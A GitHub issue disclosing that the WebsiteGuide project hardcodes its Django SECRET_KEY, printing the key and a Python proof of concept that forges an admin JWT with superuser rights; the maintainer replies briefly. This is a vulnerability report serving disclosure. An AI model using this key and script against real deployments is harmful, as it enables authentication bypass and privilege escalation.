WebsiteGuide icon indicating copy to clipboard operation
WebsiteGuide copied to clipboard
verified publisher icon mizhexiaoxiao

[Vulnerability] Hardcoded JWT Secret Key in settings.py Leads to Authentication Bypass

Open Tritium0041 opened this issue 7 months ago • 2 comments

Vulnerable File

WebsiteGuide/settings.py (Line 23)

SECRET_KEY = 'm0r4*w5&)vm9b$rj4r-*-+b+!k^f^c=-vt^)+6m_-^qrg871^x'

Vulnerability Type

Hardcoded Cryptographic Key

Impact

Attackers can:

Forge JWT tokens with arbitrary user privileges (e.g., is_superuser=True). Bypass authentication to access restricted endpoints or administrative functionality. Impersonate users (e.g., escalate privileges to admin).

Proof of Concept (POC)

import jwt
import time

# Hardcoded secret key extracted from settings.py
secret = "m0r4*w5&)vm9b$rj4r-*-+b+!k^f^c=-vt^)+6m_-^qrg871^x"

# Malicious payload with elevated privileges
payload = {
    "user_id": 1,
    "username": "admin",
    "exp": time.time() + 14400,  # Token valid for 4 hours
    "email": "null",
    "is_superuser": True  # Privilege escalation
}

# Generate forged JWT token
forged_token = jwt.encode(payload, secret, algorithm='HS256')
print(f"Forged JWT Token: {forged_token}")

visit api with the generated token:

Image

This is considered as a proof of authentication bypass.

Tritium0041 avatar May 28 '25 03:05 Tritium0041

It is recommended to regenerate the key and not disclose it

mizhexiaoxiao avatar May 28 '25 03:05 mizhexiaoxiao

So why don't generate it randomly at the start of the webserver

Tritium0041 avatar May 28 '25 03:05 Tritium0041